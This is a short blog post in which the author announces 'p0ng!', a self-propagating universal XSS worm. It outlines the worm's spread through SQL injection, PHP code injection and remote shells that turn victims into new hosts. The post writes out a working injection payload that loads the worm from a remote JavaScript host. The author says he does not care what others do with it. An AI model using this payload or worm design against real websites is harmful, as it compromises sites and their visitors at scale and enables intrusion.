Writing A Modular Universal XSS Worm.

After the diminutive XSS worm replication contest, I got the idea of writing a universal XSS worm that can be applied in almost any situation or location. No, that was a joke. I had the idea for a long time, but never got around to actually write something like it. The biggest issue regarding webapplication worms isn't about the worm size, but about the hole to let it propagate.
With remote Javascript files we can go any place and any size we want to. The only trigger we need is a simple <script/> instance to let it become part of the website and it's DOM. We only have to call the remote Javascript file each time, and we can adjust or modify the payload of the worm at any time.
The downside? well, actually there isn't one. One might argue that they could block the remote Javascript file, but when they found out a worm is hitting their system, it's usually too late. Many worms only need a few seconds to become mostly unaddressable annoying. But, p0ng!
-as this worm is called- is different. It tries to propagate itself through SQL injection, PHP code injection and also tries to fetch remote shells to upload new copies of itself. Well, that's gonna be nasty to mitigate!
How to propgate it:"><script src='http://www.acme.com/p0ng.js'></script>That's usually enough in most XSS holes. Really, besides tailoring the worm to one's needs of course.
a couple of functionalities:- SQL injection- DOM Session & global storage (thanks Firefox)- Remote shells -shell.php? turns victims into new hosts-- Automatic form fillers- Javascript source code morpher- ...Tons of other useful features for a decent worm.
The reason I wrote this universal worm was out of sheer fun. I don't care what anyone else does with it. If bad guys wanted to write something like it, they would have done that already. But screw this disclaimer! it's no magic! It is meant to learn from, and I hope the lesson will be that there is no way of stopping worms unless you just fixes your holes.
it is as simple as that. p0ng! doesn't come as a worm out of a can, it needs preparation, a goal and a vulnerable website. I hope you enjoy it, until next time: stay tuned and stay safe!